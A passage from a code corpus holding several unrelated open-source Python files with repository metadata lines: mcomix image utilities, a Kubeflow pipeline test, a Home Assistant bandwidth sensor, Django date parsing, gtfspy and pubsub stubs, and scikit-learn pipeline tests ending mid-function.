values. If <pixbuf> is a tuple, the edges will be computed from
both the left and the right image.
Note: This could be done more cleanly with subpixbuf(), but that
doesn't work as expected together with get_pixels().
"""
def group_colors(colors, steps=10):
""" This rounds a list of colors in C{colors} to the next nearest value,
i.e. 128, 83, 10 becomes 130, 85, 10 with C{steps}=5. This compensates for
dirty colors where no clear dominating color can be made out.
@return: The color that appears most often in the prominent group."""
# Start group
group = (0, 0, 0)
# List of (count, color) pairs, group contains most colors
colors_in_prominent_group = []
color_count_in_prominent_group = 0
# List of (count, color) pairs, current color group
colors_in_group = []
color_count_in_group = 0
for count, color in colors:
# Round color
rounded = [0] * len(color)
for i, color_value in enumerate(color):
if steps % 2 == 0:
middle = steps // 2
else:
middle = steps // 2 + 1
remainder = color_value % steps
if remainder >= middle:
color_value = color_value + (steps - remainder)
else:
color_value = color_value - remainder
rounded[i] = min(255, max(0, color_value))
# Change prominent group if necessary
if rounded == group:
# Color still fits in the previous color group
colors_in_group.append((count, color))
color_count_in_group += count
else:
# Color group changed, check if current group has more colors
# than last group
if color_count_in_group > color_count_in_prominent_group:
colors_in_prominent_group = colors_in_group
color_count_in_prominent_group = color_count_in_group
group = rounded
colors_in_group = [ (count, color) ]
color_count_in_group = count
# Cleanup if only one edge color group was found
if color_count_in_group > color_count_in_prominent_group:
colors_in_prominent_group = colors_in_group
colors_in_prominent_group.sort(key=operator.itemgetter(0), reverse=True)
# List is now sorted by color count, first color appears most often
return colors_in_prominent_group[0][1]
def get_edge_pixbuf(pixbuf, side, edge):
""" Returns a pixbuf corresponding to the side passed in <side>.
Valid sides are 'left', 'right', 'top', 'bottom'. """
width = pixbuf.get_width()
height = pixbuf.get_height()
edge = min(edge, width, height)
subpix = gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB,
pixbuf.get_has_alpha(), 8, edge, height)
if side == 'left':
pixbuf.copy_area(0, 0, edge, height, subpix, 0, 0)
elif side == 'right':
pixbuf.copy_area(width - edge, 0, edge, height, subpix, 0, 0)
elif side == 'top':
pixbuf.copy_area(0, 0, width, edge, subpix, 0, 0)
elif side == 'bottom':
pixbuf.copy_area(0, height - edge, width, edge, subpix, 0, 0)
else:
assert False, 'Invalid edge side'
return subpix
if not pixbufs:
return (0, 0, 0)
if not isinstance(pixbufs, (tuple, list)):
left_edge = get_edge_pixbuf(pixbufs, 'left', edge)
right_edge = get_edge_pixbuf(pixbufs, 'right', edge)
else:
assert len(pixbufs) == 2, 'Expected two pages in list'
left_edge = get_edge_pixbuf(pixbufs[0], 'left', edge)
right_edge = get_edge_pixbuf(pixbufs[1], 'right', edge)
# Find all edge colors. Color count is separate for all four edges
ungrouped_colors = []
for edge in (left_edge, right_edge):
im = pixbuf_to_pil(edge)
ungrouped_colors.extend(im.getcolors(im.size[0] * im.size[1]))
# Sum up colors from all edges
ungrouped_colors.sort(key=operator.itemgetter(1))
most_used = group_colors(ungrouped_colors)
return [color * 257 for color in most_used]
def pil_to_pixbuf(image):
"""Return a pixbuf created from the PIL <image>."""
if image.mode.startswith('RGB'):
imagestr = image.tostring()
IS_RGBA = image.mode == 'RGBA'
return gtk.gdk.pixbuf_new_from_data(imagestr, gtk.gdk.COLORSPACE_RGB,
IS_RGBA, 8, image.size[0], image.size[1],
(IS_RGBA and 4 or 3) * image.size[0])
else:
imagestr = image.convert('RGB').tostring()
return gtk.gdk.pixbuf_new_from_data(imagestr, gtk.gdk.COLORSPACE_RGB,
False, 8, image.size[0], image.size[1],
3 * image.size[0])
def pixbuf_to_pil(pixbuf):
"""Return a PIL image created from <pixbuf>."""
dimensions = pixbuf.get_width(), pixbuf.get_height()
stride = pixbuf.get_rowstride()
pixels = pixbuf.get_pixels()
mode = pixbuf.get_has_alpha() and 'RGBA' or 'RGB'
return Image.frombuffer(mode, dimensions, pixels, 'raw', mode, stride, 1)
def load_pixbuf(path):
""" Loads a pixbuf from a given image file. Works around GTK's
slowness on Win32 by using PIL for loading instead and
converting it afterwards. """
if sys.platform == 'win32' and gtk.gtk_version > (2, 18, 2):
pil_img = Image.open(path)
return pil_to_pixbuf(pil_img)
else:
return gtk.gdk.pixbuf_new_from_file(path)
def load_pixbuf_size(path, width, height):
""" Loads a pixbuf from a given image file and scale it to fit
inside (width, height). """
try:
return fit_in_rectangle(load_pixbuf(path), width, height)
except:
return None
def load_pixbuf_data(imgdata):
""" Loads a pixbuf from the data passed in <imgdata>. """
loader = gtk.gdk.PixbufLoader()
loader.write(imgdata, len(imgdata))
loader.close()
return loader.get_pixbuf()
def enhance(pixbuf, brightness=1.0, contrast=1.0, saturation=1.0,
sharpness=1.0, autocontrast=False):
"""Return a modified pixbuf from <pixbuf> where the enhancement operations
corresponding to each argument has been performed. A value of 1.0 means
no change. If <autocontrast> is True it overrides the <contrast> value,
but only if the image mode is supported by ImageOps.autocontrast (i.e.
it is L or RGB.)
"""
im = pixbuf_to_pil(pixbuf)
if brightness != 1.0:
im = ImageEnhance.Brightness(im).enhance(brightness)
if autocontrast and im.mode in ('L', 'RGB'):
im = ImageOps.autocontrast(im, cutoff=0.1)
elif contrast != 1.0:
im = ImageEnhance.Contrast(im).enhance(contrast)
if saturation != 1.0:
im = ImageEnhance.Color(im).enhance(saturation)
if sharpness != 1.0:
im = ImageEnhance.Sharpness(im).enhance(sharpness)
return pil_to_pixbuf(im)
def get_implied_rotation(pixbuf):
"""Return the implied rotation of the pixbuf, as given by the pixbuf's
orientation option (the value of which is based on EXIF data etc.).
The implied rotation is the angle (in degrees) that the raw pixbuf should
be rotated in order to be displayed "correctly". E.g. a photograph taken
by a camera that is held sideways might store this fact in its EXIF data,
and the pixbuf loader will set the orientation option correspondingly.
"""
orientation = pixbuf.get_option('orientation')
if orientation == '3':
return 180
elif orientation == '6':
return 90
elif orientation == '8':
return 270
return 0
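# Illustrative sketch (hypothetical file name): combine the implied EXIF rotation with
# fit_in_rectangle() so a sideways photograph is displayed upright in an 800x600 view.
#     pixbuf = load_pixbuf('photo.jpg')
#     upright = fit_in_rectangle(pixbuf, 800, 600,
#         rotation=get_implied_rotation(pixbuf))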
def combine_pixbufs( pixbuf1, pixbuf2, are_in_manga_mode ):
if are_in_manga_mode:
r_source_pixbuf = pixbuf1
l_source_pixbuf = pixbuf2
else:
l_source_pixbuf = pixbuf1
r_source_pixbuf = pixbuf2
has_alpha = False
if l_source_pixbuf.get_property( 'has-alpha' ) or \
r_source_pixbuf.get_property( 'has-alpha' ):
has_alpha = True
bits_per_sample = 8
l_source_pixbuf_width = l_source_pixbuf.get_property( 'width' )
r_source_pixbuf_width = r_source_pixbuf.get_property( 'width' )
l_source_pixbuf_height = l_source_pixbuf.get_property( 'height' )
r_source_pixbuf_height = r_source_pixbuf.get_property( 'height' )
new_width = l_source_pixbuf_width + r_source_pixbuf_width
new_height = max( l_source_pixbuf_height, r_source_pixbuf_height )
new_pix_buf = gtk.gdk.Pixbuf( gtk.gdk.COLORSPACE_RGB, has_alpha,
bits_per_sample, new_width, new_height )
l_source_pixbuf.copy_area( 0, 0, l_source_pixbuf_width,
l_source_pixbuf_height,
new_pix_buf, 0, 0 )
r_source_pixbuf.copy_area( 0, 0, r_source_pixbuf_width,
r_source_pixbuf_height,
new_pix_buf, l_source_pixbuf_width, 0 )
return new_pix_buf
def is_image_file(path):
"""Return True if the file at <path> is an image file recognized by PyGTK.
"""
if os.path.isfile(path):
ext = os.path.splitext(path)[1][1:].lower()
ext_index = bisect.bisect_left(_supported_formats, ext)
return ext_index != len(_supported_formats) and _supported_formats[ext_index] == ext
else:
return False
# vim: expandtab:sw=4:ts=4
| HoverHell/mcomix-0 | mcomix/image_tools.py | Python | gpl-2.0 | 15,226 |
# Copyright 2020 The Kubeflow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pathlib
from kfp import components
from kfp import dsl
from kfp import compiler
component_op_1 = components.load_component_from_text("""
name: Write to GCS
inputs:
- {name: text, type: String, description: 'Content to be written to GCS'}
outputs:
- {name: output_gcs_path, type: GCSPath, description: 'GCS file path'}
implementation:
container:
image: google/cloud-sdk:slim
command:
- sh
- -c
- |
set -e -x
echo "$0" | gsutil cp - "$1"
- {inputValue: text}
- {outputUri: output_gcs_path}
""")
component_op_2 = components.load_component_from_text("""
name: Read from GCS
inputs:
- {name: input_gcs_path, type: GCSPath, description: 'GCS file path'}
implementation:
container:
image: google/cloud-sdk:slim
command:
- sh
- -c
- |
set -e -x
gsutil cat "$0"
- {inputUri: input_gcs_path}
""")
@dsl.pipeline(name='simple-two-step-pipeline', pipeline_root='dummy_root')
def my_pipeline(text: str = 'Hello world!'):
component_1 = component_op_1(text=text).set_display_name('Producer')
component_2 = component_op_2(
input_gcs_path=component_1.outputs['output_gcs_path'])
component_2.set_display_name('Consumer')
if __name__ == '__main__':
compiler.Compiler().compile(
pipeline_func=my_pipeline,
pipeline_parameters={'text': 'Hello KFP!'},
package_path=__file__.replace('.py', '.json'))
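# Illustrative follow-up sketch (the host URL is a placeholder; whether the compiled
# JSON package can be submitted this way depends on the installed KFP SDK and backend
# versions):
#     import kfp
#     client = kfp.Client(host='http://localhost:8080')
#     client.create_run_from_pipeline_package(
#         __file__.replace('.py', '.json'), arguments={'text': 'Hello again!'})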
| kubeflow/pipelines | sdk/python/kfp/compiler_cli_tests/test_data/two_step_pipeline.py | Python | apache-2.0 | 2,004 |
"""Support for Start.ca Bandwidth Monitor."""
from datetime import timedelta
from xml.parsers.expat import ExpatError
import logging
import async_timeout
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_API_KEY, CONF_MONITORED_VARIABLES, CONF_NAME)
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'Start.ca'
CONF_TOTAL_BANDWIDTH = 'total_bandwidth'
GIGABYTES = 'GB' # type: str
PERCENT = '%' # type: str
MIN_TIME_BETWEEN_UPDATES = timedelta(hours=1)
REQUEST_TIMEOUT = 5 # seconds
SENSOR_TYPES = {
'usage': ['Usage Ratio', PERCENT, 'mdi:percent'],
'usage_gb': ['Usage', GIGABYTES, 'mdi:download'],
'limit': ['Data limit', GIGABYTES, 'mdi:download'],
'used_download': ['Used Download', GIGABYTES, 'mdi:download'],
'used_upload': ['Used Upload', GIGABYTES, 'mdi:upload'],
'used_total': ['Used Total', GIGABYTES, 'mdi:download'],
'grace_download': ['Grace Download', GIGABYTES, 'mdi:download'],
'grace_upload': ['Grace Upload', GIGABYTES, 'mdi:upload'],
'grace_total': ['Grace Total', GIGABYTES, 'mdi:download'],
'total_download': ['Total Download', GIGABYTES, 'mdi:download'],
'total_upload': ['Total Upload', GIGABYTES, 'mdi:download'],
'used_remaining': ['Remaining', GIGABYTES, 'mdi:download']
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_MONITORED_VARIABLES):
vol.All(cv.ensure_list, [vol.In(SENSOR_TYPES)]),
vol.Required(CONF_API_KEY): cv.string,
vol.Required(CONF_TOTAL_BANDWIDTH): cv.positive_int,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
})
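# Illustrative configuration.yaml sketch (keys follow PLATFORM_SCHEMA above; the API key
# and bandwidth cap values are placeholders):
#     sensor:
#       - platform: startca
#         api_key: YOUR_START_CA_API_KEY
#         total_bandwidth: 400
#         monitored_variables:
#           - usage
#           - usage_gb
#           - used_remaining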
async def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Set up the sensor platform."""
websession = async_get_clientsession(hass)
apikey = config.get(CONF_API_KEY)
bandwidthcap = config.get(CONF_TOTAL_BANDWIDTH)
ts_data = StartcaData(hass.loop, websession, apikey, bandwidthcap)
ret = await ts_data.async_update()
if ret is False:
_LOGGER.error("Invalid Start.ca API key: %s", apikey)
return
name = config.get(CONF_NAME)
sensors = []
for variable in config[CONF_MONITORED_VARIABLES]:
sensors.append(StartcaSensor(ts_data, variable, name))
async_add_entities(sensors, True)
class StartcaSensor(Entity):
"""Representation of Start.ca Bandwidth sensor."""
def __init__(self, startcadata, sensor_type, name):
"""Initialize the sensor."""
self.client_name = name
self.type = sensor_type
self._name = SENSOR_TYPES[sensor_type][0]
self._unit_of_measurement = SENSOR_TYPES[sensor_type][1]
self._icon = SENSOR_TYPES[sensor_type][2]
self.startcadata = startcadata
self._state = None
@property
def name(self):
"""Return the name of the sensor."""
return '{} {}'.format(self.client_name, self._name)
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit_of_measurement
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return self._icon
async def async_update(self):
"""Get the latest data from Start.ca and update the state."""
await self.startcadata.async_update()
if self.type in self.startcadata.data:
self._state = round(self.startcadata.data[self.type], 2)
class StartcaData:
"""Get data from Start.ca API."""
def __init__(self, loop, websession, api_key, bandwidth_cap):
"""Initialize the data object."""
self.loop = loop
self.websession = websession
self.api_key = api_key
self.bandwidth_cap = bandwidth_cap
# Set unlimited users to infinite, otherwise the cap.
self.data = {"limit": self.bandwidth_cap} if self.bandwidth_cap > 0 \
else {"limit": float('inf')}
@staticmethod
def bytes_to_gb(value):
"""Convert from bytes to GB.
:param value: The value in bytes to convert to GB.
:return: Converted GB value
"""
return float(value) * 10 ** -9
@Throttle(MIN_TIME_BETWEEN_UPDATES)
async def async_update(self):
"""Get the Start.ca bandwidth data from the web service."""
import xmltodict
_LOGGER.debug("Updating Start.ca usage data")
url = 'https://www.start.ca/support/usage/api?key=' + \
self.api_key
with async_timeout.timeout(REQUEST_TIMEOUT):
req = await self.websession.get(url)
if req.status != 200:
_LOGGER.error("Request failed with status: %u", req.status)
return False
data = await req.text()
try:
xml_data = xmltodict.parse(data)
except ExpatError:
return False
used_dl = self.bytes_to_gb(xml_data['usage']['used']['download'])
used_ul = self.bytes_to_gb(xml_data['usage']['used']['upload'])
grace_dl = self.bytes_to_gb(xml_data['usage']['grace']['download'])
grace_ul = self.bytes_to_gb(xml_data['usage']['grace']['upload'])
total_dl = self.bytes_to_gb(xml_data['usage']['total']['download'])
total_ul = self.bytes_to_gb(xml_data['usage']['total']['upload'])
limit = self.data['limit']
if self.bandwidth_cap > 0:
self.data['usage'] = 100*used_dl/self.bandwidth_cap
else:
self.data['usage'] = 0
self.data['usage_gb'] = used_dl
self.data['used_download'] = used_dl
self.data['used_upload'] = used_ul
self.data['used_total'] = used_dl + used_ul
self.data['grace_download'] = grace_dl
self.data['grace_upload'] = grace_ul
self.data['grace_total'] = grace_dl + grace_ul
self.data['total_download'] = total_dl
self.data['total_upload'] = total_ul
self.data['used_remaining'] = limit - used_dl
return True
| aequitas/home-assistant | homeassistant/components/startca/sensor.py | Python | apache-2.0 | 6,361 |
from setuptools import setup, find_packages
setup(name='BIOMD0000000122',
version=20140916,
description='BIOMD0000000122 from BioModels',
url='http://www.ebi.ac.uk/biomodels-main/BIOMD0000000122',
maintainer='Stanley Gu',
maintainer_url='[email protected]',
packages=find_packages(),
package_data={'': ['*.xml', 'README.md']},
      )
 | biomodels/BIOMD0000000122 | setup.py | Python | cc0-1.0 | 377
"""Functions to parse datetime objects."""
# We're using regular expressions rather than time.strptime because:
# - They provide both validation and parsing.
# - They're more flexible for datetimes.
# - The date/datetime/time constructors produce friendlier error messages.
import datetime
import re
from django.utils import six
from django.utils.timezone import get_fixed_timezone, utc
date_re = re.compile(
r'(?P<year>\d{4})-(?P<month>\d{1,2})-(?P<day>\d{1,2})$'
)
time_re = re.compile(
r'(?P<hour>\d{1,2}):(?P<minute>\d{1,2})'
r'(?::(?P<second>\d{1,2})(?:\.(?P<microsecond>\d{1,6})\d{0,6})?)?'
)
datetime_re = re.compile(
r'(?P<year>\d{4})-(?P<month>\d{1,2})-(?P<day>\d{1,2})'
r'[T ](?P<hour>\d{1,2}):(?P<minute>\d{1,2})'
r'(?::(?P<second>\d{1,2})(?:\.(?P<microsecond>\d{1,6})\d{0,6})?)?'
r'(?P<tzinfo>Z|[+-]\d{2}(?::?\d{2})?)?$'
)
standard_duration_re = re.compile(
r'^'
r'(?:(?P<days>-?\d+) (days?, )?)?'
r'((?:(?P<hours>\d+):)(?=\d+:\d+))?'
r'(?:(?P<minutes>\d+):)?'
r'(?P<seconds>\d+)'
r'(?:\.(?P<microseconds>\d{1,6})\d{0,6})?'
r'$'
)
# Support the sections of ISO 8601 date representation that are accepted by
# timedelta
iso8601_duration_re = re.compile(
r'^P'
    r'(?:(?P<days>\d+(\.\d+)?)D)?'
    r'(?:T'
    r'(?:(?P<hours>\d+(\.\d+)?)H)?'
    r'(?:(?P<minutes>\d+(\.\d+)?)M)?'
    r'(?:(?P<seconds>\d+(\.\d+)?)S)?'
r')?'
r'$'
)
def parse_date(value):
"""Parses a string and return a datetime.date.
Raises ValueError if the input is well formatted but not a valid date.
Returns None if the input isn't well formatted.
"""
match = date_re.match(value)
if match:
kw = {k: int(v) for k, v in six.iteritems(match.groupdict())}
return datetime.date(**kw)
def parse_time(value):
"""Parses a string and return a datetime.time.
This function doesn't support time zone offsets.
Raises ValueError if the input is well formatted but not a valid time.
Returns None if the input isn't well formatted, in particular if it
contains an offset.
"""
match = time_re.match(value)
if match:
kw = match.groupdict()
if kw['microsecond']:
kw['microsecond'] = kw['microsecond'].ljust(6, '0')
kw = {k: int(v) for k, v in six.iteritems(kw) if v is not None}
return datetime.time(**kw)
def parse_datetime(value):
"""Parses a string and return a datetime.datetime.
This function supports time zone offsets. When the input contains one,
the output uses a timezone with a fixed offset from UTC.
Raises ValueError if the input is well formatted but not a valid datetime.
Returns None if the input isn't well formatted.
"""
match = datetime_re.match(value)
if match:
kw = match.groupdict()
if kw['microsecond']:
kw['microsecond'] = kw['microsecond'].ljust(6, '0')
tzinfo = kw.pop('tzinfo')
if tzinfo == 'Z':
tzinfo = utc
elif tzinfo is not None:
offset_mins = int(tzinfo[-2:]) if len(tzinfo) > 3 else 0
offset = 60 * int(tzinfo[1:3]) + offset_mins
if tzinfo[0] == '-':
offset = -offset
tzinfo = get_fixed_timezone(offset)
kw = {k: int(v) for k, v in six.iteritems(kw) if v is not None}
kw['tzinfo'] = tzinfo
return datetime.datetime(**kw)
def parse_duration(value):
"""Parses a duration string and returns a datetime.timedelta.
The preferred format for durations in Django is '%d %H:%M:%S.%f'.
Also supports ISO 8601 representation.
"""
match = standard_duration_re.match(value)
if not match:
match = iso8601_duration_re.match(value)
if match:
kw = match.groupdict()
if kw.get('microseconds'):
kw['microseconds'] = kw['microseconds'].ljust(6, '0')
kw = {k: float(v) for k, v in six.iteritems(kw) if v is not None}
return datetime.timedelta(**kw)
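# Illustrative results for well-formatted input (derived from the regexes above):
#     parse_date('2016-05-03')               -> datetime.date(2016, 5, 3)
#     parse_time('10:20:30.400')             -> datetime.time(10, 20, 30, 400000)
#     parse_datetime('2016-05-03 10:20:30Z') -> datetime(2016, 5, 3, 10, 20, 30, tzinfo=utc)
#     parse_duration('3 10:20:30.400')       -> timedelta(days=3, seconds=37230, microseconds=400000)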
| yephper/django | django/utils/dateparse.py | Python | bsd-3-clause | 4,122 |
from unittest import TestCase
from gtfspy.routing.profile_block_analyzer import ProfileBlockAnalyzer
from gtfspy.routing.profile_block import ProfileBlock
class TestProfileBlockAnalyzer(TestCase):
def test_interpolate(self):
blocks = [ProfileBlock(0, 1, 2, 1), ProfileBlock(1, 2, 2, 2)]
analyzer = ProfileBlockAnalyzer(blocks, cutoff_distance=3.0)
self.assertAlmostEqual(analyzer.interpolate(0.2), 1.8)
self.assertAlmostEqual(analyzer.interpolate(1-10**-9), 1.)
self.assertAlmostEqual(analyzer.interpolate(1), 1)
self.assertAlmostEqual(analyzer.interpolate(1.+10**-9), 2)
self.assertAlmostEqual(analyzer.interpolate(1.23), 2)
self.assertAlmostEqual(analyzer.interpolate(2), 2)
| CxAalto/gtfspy | gtfspy/routing/test/test_profile_block_analyzer.py | Python | mit | 751 |
"""
This is not really a package init file, it is only here to simplify the
packaging and installation of pubsub.core's protocol-specific subfolders
by setuptools. The python modules in this folder are automatically made
part of pubsub.core via pubsub.core's __path__. Hence, this should not
be imported directly, it is part of pubsub.core when the messaging
protocol is "kwargs" (and not usable otherwise).
:copyright: Copyright since 2006 by Oliver Schoenborn, all rights reserved.
:license: BSD, see LICENSE_BSD_Simple.txt for details.
"""
msg = 'Should not import this directly, used by pubsub.core if applicable'
raise RuntimeError(msg) | garrettcap/Bulletproof-Backup | wx/lib/pubsub/core/kwargs/__init__.py | Python | gpl-2.0 | 646 |
"""
Test the pipeline module.
"""
import numpy as np
from scipy import sparse
from sklearn.externals.six.moves import zip
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_raises_regex
from sklearn.utils.testing import assert_raise_message
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_false
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_warns_message
from sklearn.utils.testing import assert_dict_equal
from sklearn.base import clone, BaseEstimator
from sklearn.pipeline import Pipeline, FeatureUnion, make_pipeline, make_union
from sklearn.svm import SVC
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import LinearRegression
from sklearn.cluster import KMeans
from sklearn.feature_selection import SelectKBest, f_classif
from sklearn.decomposition import PCA, TruncatedSVD
from sklearn.datasets import load_iris
from sklearn.preprocessing import StandardScaler
from sklearn.feature_extraction.text import CountVectorizer
JUNK_FOOD_DOCS = (
"the pizza pizza beer copyright",
"the pizza burger beer copyright",
"the the pizza beer beer copyright",
"the burger beer beer copyright",
"the coke burger coke copyright",
"the coke burger burger",
)
class NoFit(object):
"""Small class to test parameter dispatching.
"""
def __init__(self, a=None, b=None):
self.a = a
self.b = b
class NoTrans(NoFit):
def fit(self, X, y):
return self
def get_params(self, deep=False):
return {'a': self.a, 'b': self.b}
def set_params(self, **params):
self.a = params['a']
return self
class NoInvTransf(NoTrans):
def transform(self, X, y=None):
return X
class Transf(NoInvTransf):
def transform(self, X, y=None):
return X
def inverse_transform(self, X):
return X
class Mult(BaseEstimator):
def __init__(self, mult=1):
self.mult = mult
def fit(self, X, y):
return self
def transform(self, X):
return np.asarray(X) * self.mult
def inverse_transform(self, X):
return np.asarray(X) / self.mult
def predict(self, X):
return (np.asarray(X) * self.mult).sum(axis=1)
predict_proba = predict_log_proba = decision_function = predict
def score(self, X, y=None):
return np.sum(X)
class FitParamT(BaseEstimator):
"""Mock classifier
"""
def __init__(self):
self.successful = False
def fit(self, X, y, should_succeed=False):
self.successful = should_succeed
def predict(self, X):
return self.successful
def test_pipeline_init():
# Test the various init parameters of the pipeline.
assert_raises(TypeError, Pipeline)
# Check that we can't instantiate pipelines with objects without fit
# method
assert_raises_regex(TypeError,
'Last step of Pipeline should implement fit. '
'.*NoFit.*',
Pipeline, [('clf', NoFit())])
# Smoke test with only an estimator
clf = NoTrans()
pipe = Pipeline([('svc', clf)])
assert_equal(pipe.get_params(deep=True),
dict(svc__a=None, svc__b=None, svc=clf,
**pipe.get_params(deep=False)))
# Check that params are set
pipe.set_params(svc__a=0.1)
assert_equal(clf.a, 0.1)
assert_equal(clf.b, None)
# Smoke test the repr:
repr(pipe)
# Test with two objects
clf = SVC()
filter1 = SelectKBest(f_classif)
pipe = Pipeline([('anova', filter1), ('svc', clf)])
# Check that we can't instantiate with non-transformers on the way
# Note that NoTrans implements fit, but not transform
assert_raises_regex(TypeError,
'All intermediate steps should be transformers'
'.*\\bNoTrans\\b.*',
Pipeline, [('t', NoTrans()), ('svc', clf)])
# Check that params are set
pipe.set_params(svc__C=0.1)
assert_equal(clf.C, 0.1)
# Smoke test the repr:
repr(pipe)
# Check that params are not set when naming them wrong
assert_raises(ValueError, pipe.set_params, anova__C=0.1)
# Test clone
pipe2 = clone(pipe)
assert_false(pipe.named_steps['svc'] is pipe2.named_steps['svc'])
# Check that apart from estimators, the parameters are the same
params = pipe.get_params(deep=True)
params2 = pipe2.get_params(deep=True)
for x in pipe.get_params(deep=False):
params.pop(x)
for x in pipe2.get_params(deep=False):
params2.pop(x)
# Remove estimators that where copied
params.pop('svc')
params.pop('anova')
params2.pop('svc')
params2.pop('anova')
assert_equal(params, params2)
def test_pipeline_methods_anova():
# Test the various methods of the pipeline (anova).
iris = load_iris()
X = iris.data
y = iris.target
# Test with Anova + LogisticRegression
clf = LogisticRegression()
filter1 = SelectKBest(f_classif, k=2)
pipe = Pipeline([('anova', filter1), ('logistic', clf)])
pipe.fit(X, y)
pipe.predict(X)
pipe.predict_proba(X)
pipe.predict_log_proba(X)
pipe.score(X, y)
def test_pipeline_fit_params():
# Test that the pipeline can take fit parameters
pipe = Pipeline([('transf', Transf()), ('clf', FitParamT())])
pipe.fit(X=None, y=None, clf__should_succeed=True)
# classifier should return True
assert_true(pipe.predict(None))
# and transformer params should not be changed
assert_true(pipe.named_steps['transf'].a is None)
assert_true(pipe.named_steps['transf'].b is None)
def test_pipeline_raise_set_params_error():
# Test pipeline raises set params error message for nested models.
pipe = Pipeline([('cls', LinearRegression())])
# expected error message
error_msg = ('Invalid parameter %s for estimator %s. '
'Check the list of available parameters '
'with `estimator.get_params().keys()`.')
assert_raise_message(ValueError,
error_msg % ('fake', 'Pipeline'),
pipe.set_params,
fake='nope')
# nested model check
assert_raise_message(ValueError,
error_msg % ("fake", pipe),
pipe.set_params,
fake__estimator='nope')
def test_pipeline_methods_pca_svm():
# Test the various methods of the pipeline (pca + svm).
iris = load_iris()
X = iris.data
y = iris.target
# Test with PCA + SVC
clf = SVC(probability=True, random_state=0)
pca = PCA(svd_solver='full', n_components='mle', whiten=True)
pipe = Pipeline([('pca', pca), ('svc', clf)])
pipe.fit(X, y)
pipe.predict(X)
pipe.predict_proba(X)
pipe.predict_log_proba(X)
pipe.score(X, y)
def test_pipeline_methods_preprocessing_svm():
# Test the various methods of the pipeline (preprocessing + svm).
iris = load_iris()
X = iris.data
y = iris.target
n_samples = X.shape[0]
n_classes = len(np.unique(y))
scaler = StandardScaler()
pca = PCA(n_components=2, svd_solver='randomized', whiten=True)
clf = SVC(probability=True, random_state=0, decision_function_shape='ovr')
for preprocessing in [scaler, pca]:
pipe = Pipeline([('preprocess', preprocessing), ('svc', clf)])
pipe.fit(X, y)
# check shapes of various prediction functions
predict = pipe.predict(X)
assert_equal(predict.shape, (n_samples,))
proba = pipe.predict_proba(X)
assert_equal(proba.shape, (n_samples, n_classes))
log_proba = pipe.predict_log_proba(X)
assert_equal(log_proba.shape, (n_samples, n_classes))
decision_function = pipe.decision_function(X)
assert_equal(decision_function.shape, (n_samples, n_classes))
pipe.score(X, y)
def test_fit_predict_on_pipeline():
# test that the fit_predict method is implemented on a pipeline
# test that the fit_predict on pipeline yields same results as applying
# transform and clustering steps separately
iris = load_iris()
scaler = StandardScaler()
km = KMeans(random_state=0)
# first compute the transform and clustering step separately
scaled = scaler.fit_transform(iris.data)
separate_pred = km.fit_predict(scaled)
# use a pipeline to do the transform and clustering in one step
pipe = Pipeline([('scaler', scaler), ('Kmeans', km)])
pipeline_pred = pipe.fit_predict(iris.data)
assert_array_almost_equal(pipeline_pred, separate_pred)
def test_fit_predict_on_pipeline_without_fit_predict():
# tests that a pipeline does not have fit_predict method when final
# step of pipeline does not have fit_predict defined
scaler = StandardScaler()
pca = PCA(svd_solver='full')
pipe = Pipeline([('scaler', scaler), ('pca', pca)])
assert_raises_regex(AttributeError,
"'PCA' object has no attribute 'fit_predict'",
getattr, pipe, 'fit_predict')
def test_feature_union():
# basic sanity check for feature union
iris = load_iris()
X = iris.data
X -= X.mean(axis=0)
y = iris.target
svd = TruncatedSVD(n_components=2, random_state=0)
select = SelectKBest(k=1)
fs = FeatureUnion([("svd", svd), ("select", select)])
fs.fit(X, y)
X_transformed = fs.transform(X)
assert_equal(X_transformed.shape, (X.shape[0], 3))
# check if it does the expected thing
assert_array_almost_equal(X_transformed[:, :-1], svd.fit_transform(X))
assert_array_equal(X_transformed[:, -1],
select.fit_transform(X, y).ravel())
# test if it also works for sparse input
# We use a different svd object to control the random_state stream
fs = FeatureUnion([("svd", svd), ("select", select)])
X_sp = sparse.csr_matrix(X)
X_sp_transformed = fs.fit_transform(X_sp, y)
assert_array_almost_equal(X_transformed, X_sp_transformed.toarray())
# test setting parameters
fs.set_params(select__k=2)
assert_equal(fs.fit_transform(X, y).shape, (X.shape[0], 4))
# test it works with transformers missing fit_transform
fs = FeatureUnion([("mock", Transf()), ("svd", svd), ("select", select)])
X_transformed = fs.fit_transform(X, y)
assert_equal(X_transformed.shape, (X.shape[0], 8))
# test error if some elements do not support transform
assert_raises_regex(TypeError,
'All estimators should implement fit and '
'transform.*\\bNoTrans\\b',
FeatureUnion,
[("transform", Transf()), ("no_transform", NoTrans())])
def test_make_union():
pca = PCA(svd_solver='full')
mock = Transf()
fu = make_union(pca, mock)
names, transformers = zip(*fu.transformer_list)
assert_equal(names, ("pca", "transf"))
assert_equal(transformers, (pca, mock))
def test_pipeline_transform():
# Test whether pipeline works with a transformer at the end.
# Also test pipeline.transform and pipeline.inverse_transform
iris = load_iris()
X = iris.data
pca = PCA(n_components=2, svd_solver='full')
pipeline = Pipeline([('pca', pca)])
# test transform and fit_transform:
X_trans = pipeline.fit(X).transform(X)
